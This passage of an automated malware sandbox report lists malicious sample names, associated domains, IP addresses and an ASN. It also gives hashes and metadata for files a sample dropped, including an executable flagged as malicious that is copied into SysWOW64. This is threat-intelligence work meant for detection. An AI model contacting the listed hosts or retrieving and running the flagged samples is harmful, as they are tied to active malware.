                                                                              LGdWroB8YK.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              VzTxDq5EOO.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              cMoMTuExNm.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              Ep3t7iZ5dS.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              YUlLw3N2sv.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              XUFcpxTVvC.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              Ta8fqo9ZLt.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              Mx2eEjLekY.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/
                                                                              bFX12nhbOR.exeGet hashmaliciousBrowse
                                                                              • avtlsgosecure.com/

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              svartalfheim.topfile.exeGet hashmaliciousBrowse
                                                                              • 176.124.192.220
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 176.124.192.220
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 176.124.192.220
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 46.173.218.63
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 46.173.218.63
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 46.173.218.63
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 46.173.218.63
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 46.173.218.63
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 46.173.218.63
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 46.173.218.63
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 46.173.218.63
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 46.173.218.63
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 46.173.218.63
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 46.173.218.63
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 46.173.218.63
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 46.173.218.63
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 46.173.218.63
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 46.173.218.63
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 46.173.218.63
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 46.173.218.63

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              GULFSTREAMUAfile.exeGet hashmaliciousBrowse
                                                                              • 176.124.192.220
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 176.124.192.220
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 176.124.192.220
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 176.124.192.220
                                                                              CdFKX9gHlY.exeGet hashmaliciousBrowse
                                                                              • 176.124.207.81
                                                                              msys2-x86_64-20221028.exeGet hashmaliciousBrowse
                                                                              • 176.124.216.31
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 176.124.214.196
                                                                              https://bit.ly/3kBimufGet hashmaliciousBrowse
                                                                              • 176.124.192.132
                                                                              http://she32rn1.comGet hashmaliciousBrowse
                                                                              • 176.124.216.159
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 176.124.222.19
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 176.124.222.19
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 176.124.222.19
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 176.124.222.19
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 176.124.222.19
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 176.124.222.19
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 176.124.222.19
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 176.124.222.19
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 176.124.222.19
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 176.124.222.19
                                                                              file.exeGet hashmaliciousBrowse
                                                                              • 176.124.222.19

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:XML 1.0 document, ASCII text, with very long lines (2494), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2494
                                                                              Entropy (8bit):5.2403296958449355
                                                                              Encrypted:false
                                                                              SSDEEP:24:2dS48pX4y/DvKWDkQpyH2YX8ICDKbNRTrxKTBM2JT52YwFPYzKEqXpUfKFkeRupB:cAn/TLtfGgzmQLeUp/B8HoSkC9+TIYAs
                                                                              MD5:BDC008D0C34A85E8B2CF0502871A8D73
                                                                              SHA1:0DBF1368F6D3C401D410BFA69B1A0E1BCBCE2558
                                                                              SHA-256:514AD1AC5994134A6314AD8A504B79EB558775C1E0269F811B1C11F2CF26AD12
                                                                              SHA-512:0D495FCB897BFF1A3530F9F6684770082BC330131B26E263C9E55B04288B6E36F8DFEE9A6B61566809F55DB353C8B35FCF0A8E5D7352307F5DBEBC5A7C9FF8FC
                                                                              Malicious:false
                                                                              Preview:<?xml version="1.0" encoding="UTF-8"?><updateStore><sessionVariables><permanent><AUOptions dataType="3">1</AUOptions><AllowMUUpdateService dataType="3">0</AllowMUUpdateService><AreUpdatesPausedByPolicy dataType="11">False</AreUpdatesPausedByPolicy><AttentionRequiredReason dataType="19">0</AttentionRequiredReason><CurrentState dataType="19">1</CurrentState><FirstScanAttemptTime dataType="21">132399969272148706</FirstScanAttemptTime><FlightEnabled dataType="3">0</FlightEnabled><LastError dataType="19">0</LastError><LastErrorState dataType="19">0</LastErrorState><LastErrorStateType dataType="11">False</LastErrorStateType><LastMeteredScanTime dataType="21">132399969272304939</LastMeteredScanTime><LastScanAttemptTime dataType="21">132399969272148706</LastScanAttemptTime><LastScanDeferredReason dataType="19">1</LastScanDeferredReason><LastScanDeferredTime dataType="21">133051593686244000</LastScanDeferredTime><LastScanFailureError dataType="3">-2147023838</LastScanFailureError><LastScanFailu

                                                                              C:\ProgramData\USOPrivate\UpdateStore\updatestoretemp51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:XML 1.0 document, ASCII text, with very long lines (2494), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2494
                                                                              Entropy (8bit):5.2403296958449355
                                                                              Encrypted:false
                                                                              SSDEEP:24:2dS48pX4y/DvKWDkQpyH2YX8ICDKbNRTrxKTBM2JT52YwFPYzKEqXpUfKFkeRupB:cAn/TLtfGgzmQLeUp/B8HoSkC9+TIYAs
                                                                              MD5:BDC008D0C34A85E8B2CF0502871A8D73
                                                                              SHA1:0DBF1368F6D3C401D410BFA69B1A0E1BCBCE2558
                                                                              SHA-256:514AD1AC5994134A6314AD8A504B79EB558775C1E0269F811B1C11F2CF26AD12
                                                                              SHA-512:0D495FCB897BFF1A3530F9F6684770082BC330131B26E263C9E55B04288B6E36F8DFEE9A6B61566809F55DB353C8B35FCF0A8E5D7352307F5DBEBC5A7C9FF8FC
                                                                              Malicious:false
                                                                              Preview:<?xml version="1.0" encoding="UTF-8"?><updateStore><sessionVariables><permanent><AUOptions dataType="3">1</AUOptions><AllowMUUpdateService dataType="3">0</AllowMUUpdateService><AreUpdatesPausedByPolicy dataType="11">False</AreUpdatesPausedByPolicy><AttentionRequiredReason dataType="19">0</AttentionRequiredReason><CurrentState dataType="19">1</CurrentState><FirstScanAttemptTime dataType="21">132399969272148706</FirstScanAttemptTime><FlightEnabled dataType="3">0</FlightEnabled><LastError dataType="19">0</LastError><LastErrorState dataType="19">0</LastErrorState><LastErrorStateType dataType="11">False</LastErrorStateType><LastMeteredScanTime dataType="21">132399969272304939</LastMeteredScanTime><LastScanAttemptTime dataType="21">132399969272148706</LastScanAttemptTime><LastScanDeferredReason dataType="19">1</LastScanDeferredReason><LastScanDeferredTime dataType="21">133051593686244000</LastScanDeferredTime><LastScanFailureError dataType="3">-2147023838</LastScanFailureError><LastScanFailu

                                                                              C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.001.etl (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):8192
                                                                              Entropy (8bit):3.7601426671271163
                                                                              Encrypted:false
                                                                              SSDEEP:96:uoi8itI/ZndZNnAp9Z61zZs4Z5k907HUffZ3AZOX6Z6NZeA3CbZTQZMTkInZLpQ:Zi8ite3NneWpmaXid0eMYiLpQ
                                                                              MD5:4D6F0CCB342CAC8385F7158440CBB800
                                                                              SHA1:7B2187390048610B2C82A361A2E8EEEF0868C21B
                                                                              SHA-256:7C33E7A878DA01E5E1825603194C2C9E0FB8F260B8AB331613C2EB0B327A3864
                                                                              SHA-512:4462E8CCF3268C46377E67F9799A7B01EBA24717B84F8E14C84FCA92F42609D573B1C1D4AE5CDB502C2FA4D1B662C81D8F4BC01EA9F4338D4DF128A3350A3218
                                                                              Malicious:false
                                                                              Preview:................................................................................,...0.....`mr;...................B..............Zb..K....(..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................%.?...... .......`mr;..........U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.U.S.O.S.h.a.r.e.d.\.L.o.g.s.\.U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n._.T.e.m.p...1...e.t.l.........P.P.,...0....8gmr;..................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration_Temp.1.etl

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):8192
                                                                              Entropy (8bit):3.7601426671271163
                                                                              Encrypted:false
                                                                              SSDEEP:96:uoi8itI/ZndZNnAp9Z61zZs4Z5k907HUffZ3AZOX6Z6NZeA3CbZTQZMTkInZLpQ:Zi8ite3NneWpmaXid0eMYiLpQ
                                                                              MD5:4D6F0CCB342CAC8385F7158440CBB800
                                                                              SHA1:7B2187390048610B2C82A361A2E8EEEF0868C21B
                                                                              SHA-256:7C33E7A878DA01E5E1825603194C2C9E0FB8F260B8AB331613C2EB0B327A3864
                                                                              SHA-512:4462E8CCF3268C46377E67F9799A7B01EBA24717B84F8E14C84FCA92F42609D573B1C1D4AE5CDB502C2FA4D1B662C81D8F4BC01EA9F4338D4DF128A3350A3218
                                                                              Malicious:false
                                                                              Preview:................................................................................,...0.....`mr;...................B..............Zb..K....(..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................%.?...... .......`mr;..........U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.U.S.O.S.h.a.r.e.d.\.L.o.g.s.\.U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n._.T.e.m.p...1...e.t.l.........P.P.,...0....8gmr;..................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.11004012961626064
                                                                              Encrypted:false
                                                                              SSDEEP:12:26Y3xgXm/Ey6q99950anNq3qQ10nMCldimE8eawHjcogn:26QLl68SagLyMCldzE9BHjcp
                                                                              MD5:5398B5971E6A8C924757AD8450DDDCEA
                                                                              SHA1:2B0B99C436D023DDB496F8549CDA84AF76EEE48A
                                                                              SHA-256:F69C7AEF9BE67BA09D2D8A9673475CEA648ED784A96579B02C0883CA73EB6732
                                                                              SHA-512:F2DD0A29A0C8EBC01C124E0EF7B5B6DC99435C09B631ED0784650C89759E8F71048D4436ED02715A3F2FE3904C00C2132B8468F18D670FD33220FC6D14D93489
                                                                              Malicious:false
                                                                              Preview:........................................................................................j.q......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................%.?...... ........jr;..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.........I.q.....................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.11249012819257488
                                                                              Encrypted:false
                                                                              SSDEEP:12:MxdlDXm/Ey6q99950aOg1miM3qQ10nMCldimE8eawHza1miIrSd:MvIl68SaX1tMLyMCldzE9BHza1tIC
                                                                              MD5:D1338C24B474F80B9D7A721DDDA3E149
                                                                              SHA1:C726DCA04341646E0453B24CF482077ADCE7DB74
                                                                              SHA-256:6DA48AD356AA520E0FDBE965FD998041401F0C46758DF1ED849DFEB62CC55A15
                                                                              SHA-512:132F97E55880EDBCC5807C5CC41613A64F9BB0D7FBC3B1DE400B6438A8BEC3078D999F319CE27C605879023ADBF5DCDB0C2622E4DCF8C4865643FF61CF1AD349
                                                                              Malicious:false
                                                                              Preview:........................................................................................*_o......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................%.?...... ......d.jr;..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P..........go.....................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.1125005015962772
                                                                              Encrypted:false
                                                                              SSDEEP:12:MxCnXm/Ey6q99950ap11mK2P3qQ10nMCldimE8eawHza1mK2P:MUWl68SaT1iPLyMCldzE9BHza1I
                                                                              MD5:F7FF3F878EA4E230282D26BD877E2689
                                                                              SHA1:4BC8A22487FA18BFA85E083ADA2C8BAEC128E764
                                                                              SHA-256:E34E59D46F9316AA83FE293A0F1E3A7BE34C3A908DA952B470D97503DF85E9B1
                                                                              SHA-512:41E21EBA179704BCE1BC8B5686B5D372DA9122960BF76919F9ACE30DB677D5C21E00E11599C5C3207ED09FB979BFC29BC4819657FC1C1D28E626B3A333A7C571
                                                                              Malicious:false
                                                                              Preview:..........................................................................................n......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................%.?...... ......<.jr;..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.........N(n.....................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\qbxctmyn.exe

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):12343296
                                                                              Entropy (8bit):3.4208454596549234
                                                                              Encrypted:false
                                                                              SSDEEP:6144:4JMjbyLY3DuTsP8d2nQO0o7MFGU15Ts+XAW:4JMjbyM3DW8qQa5TsV
                                                                              MD5:D83D3102AEE8419201BF810DE2A41992
                                                                              SHA1:30EC9FD8B35C5FEC5366FE52C7BF77E57A0C67A2
                                                                              SHA-256:4F8B000276DE586232FC912CDB72B497C305E8E13A8DEF72D3A2B0BA2FB7E0C9
                                                                              SHA-512:F3E9CEF20B8751716F1426DCACDA675F2672F60FF55218CB4A9BEC141A736D2B12E8761BCFC7115CD5F46DF3E5A83F3D399BD110EF37000F31EAEABDAE3BDCA2
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L.....a.....................>......or............@........................................................................l...P...................................@...............................p9..@............................................text............................... ..`.data...0........8..................@....rsrc............ ..................@..@.reloc..n'.......x..................@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001 (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.11004012961626064
                                                                              Encrypted:false
                                                                              SSDEEP:12:26Y3xgXm/Ey6q99950anNq3qQ10nMCldimE8eawHjcogn:26QLl68SagLyMCldzE9BHjcp
                                                                              MD5:5398B5971E6A8C924757AD8450DDDCEA
                                                                              SHA1:2B0B99C436D023DDB496F8549CDA84AF76EEE48A
                                                                              SHA-256:F69C7AEF9BE67BA09D2D8A9673475CEA648ED784A96579B02C0883CA73EB6732
                                                                              SHA-512:F2DD0A29A0C8EBC01C124E0EF7B5B6DC99435C09B631ED0784650C89759E8F71048D4436ED02715A3F2FE3904C00C2132B8468F18D670FD33220FC6D14D93489
                                                                              Malicious:false
                                                                              Preview:........................................................................................j.q......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................%.?...... ........jr;..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.........I.q.....................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.11249012819257488
                                                                              Encrypted:false
                                                                              SSDEEP:12:MxdlDXm/Ey6q99950aOg1miM3qQ10nMCldimE8eawHza1miIrSd:MvIl68SaX1tMLyMCldzE9BHza1tIC
                                                                              MD5:D1338C24B474F80B9D7A721DDDA3E149
                                                                              SHA1:C726DCA04341646E0453B24CF482077ADCE7DB74
                                                                              SHA-256:6DA48AD356AA520E0FDBE965FD998041401F0C46758DF1ED849DFEB62CC55A15
                                                                              SHA-512:132F97E55880EDBCC5807C5CC41613A64F9BB0D7FBC3B1DE400B6438A8BEC3078D999F319CE27C605879023ADBF5DCDB0C2622E4DCF8C4865643FF61CF1AD349
                                                                              Malicious:false
                                                                              Preview:........................................................................................*_o......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................%.?...... ......d.jr;..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P..........go.....................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001 (copy)

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.1125005015962772
                                                                              Encrypted:false
                                                                              SSDEEP:12:MxCnXm/Ey6q99950ap11mK2P3qQ10nMCldimE8eawHza1mK2P:MUWl68SaT1iPLyMCldzE9BHza1I
                                                                              MD5:F7FF3F878EA4E230282D26BD877E2689
                                                                              SHA1:4BC8A22487FA18BFA85E083ADA2C8BAEC128E764
                                                                              SHA-256:E34E59D46F9316AA83FE293A0F1E3A7BE34C3A908DA952B470D97503DF85E9B1
                                                                              SHA-512:41E21EBA179704BCE1BC8B5686B5D372DA9122960BF76919F9ACE30DB677D5C21E00E11599C5C3207ED09FB979BFC29BC4819657FC1C1D28E626B3A333A7C571
                                                                              Malicious:false
                                                                              Preview:..........................................................................................n......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................%.?...... ......<.jr;..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.........N(n.....................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Windows\Logs\waasmedic\waasmedic.20230208_040427_786.etl

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):8192
                                                                              Entropy (8bit):2.7367341524723185
                                                                              Encrypted:false
                                                                              SSDEEP:48:31Ir52QWsb7kUub7kE7b7klXb7kib7kbIl9lnb7k0tplKb7k0b7k6b7kwQb7k9O:62k0Uu0g010i0U910ClK00060P09O
                                                                              MD5:ECA63CBE24540409B8D7D26006AFC7E9
                                                                              SHA1:E68668D56F8DE0B218AB8CE1CAEDAB67738758F5
                                                                              SHA-256:C335F94E1135F05A7C9C43DE5836BDBE27F2E434F787D9FC0009F5FAEA226B57
                                                                              SHA-512:C0181EA0EE254E387F50B9526BAF3241AF700955588AC99FBE12105B9D40EFB857CD981C8BF533C6CF777AFF0DFFD62873601A3D2EA9FA96804758436E12F50F
                                                                              Malicious:false
                                                                              Preview:....................................................!...........................4...l............................B.......)..r;..Zb....... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................WW...... .......'pr;..........E.C.C.B.1.7.5.F.-.1.E.B.2.-.4.3.D.A.-.B.F.B.5.-.A.8.D.5.8.A.4.0.A.4.D.7...C.:.\.W.i.n.d.o.w.s.\.l.o.g.s.\.w.a.a.s.m.e.d.i.c.\.w.a.a.s.m.e.d.i.c...2.0.2.3.0.2.0.8._.0.4.0.4.2.7._.7.8.6...e.t.l.............P.P.4...l.......................................................................9.B.........17134.1.amd64fre.rs4_release.180410-1804............5.@.........OYo."(.s..O........WaaSMedicSvc.pdb............................................................................................................................................................................................................................

                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

                                                                              Download File
                                                                              Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:modified
                                                                              Size (bytes):10874
                                                                              Entropy (8bit):3.1639573047664586
                                                                              Encrypted:false
                                                                              SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3z5+6I3+zJf+k:j+s+v+b+P+m+0+Q+q+q+73+zB+k
                                                                              MD5:0B770DFFF3F665694BF6BF00027A9FBD
                                                                              SHA1:6012FF2CF0F996B044312A974D75656DCBED702D
                                                                              SHA-256:3B7BA89B0A8AD80E3BEF0616DFF905DA9A50608933FAFC2B76DA22A4B610B6B6
                                                                              SHA-512:A151849ADB59ED84FA413787466E05EA042C7269383B4E24AEB0F4E74E43F4EC33324F90459ACD1BED6ACD30A3F9036D886360480697C24F1EB5A616D1012D08
                                                                              Malicious:false
                                                                              Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

                                                                              C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20230208_040419_207.etl

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):8192
                                                                              Entropy (8bit):3.3870081431882535
                                                                              Encrypted:false
                                                                              SSDEEP:96:oC/2o+oa5Q+97/YzWC9/I2lfikm/441T2IjFzdNMCn6JROY5Y:7uRjuu2g9CC4q
                                                                              MD5:703B2EA8C4DAFDC027C9C239FD4E6F41
                                                                              SHA1:5F826A311D1DA602C058515822326D2DC4B19540
                                                                              SHA-256:13529537165F17E8C7916312AAE8444F013F69CA50F9C5FCBF04539B7085417E
                                                                              SHA-512:31941279367ED33D22B2A84F1E906D263E2DEA3C03C0961962A428957CBD7516AEAFF16EC6A90C35D5600C13B80A98A3355E619BA6AFB2284F888FAA1507709A
                                                                              Malicious:false
                                                                              Preview:.... ... ....................................... ...!...................................{........................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................WW...... ........kr;..........8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.3.0.2.0.8._.0.4.0.4.1.9._.2.0.7...e.t.l.........P.P.........{.......................................................................................................................................................................................................................................................................

                                                                              C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe (copy)

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\cmd.exe
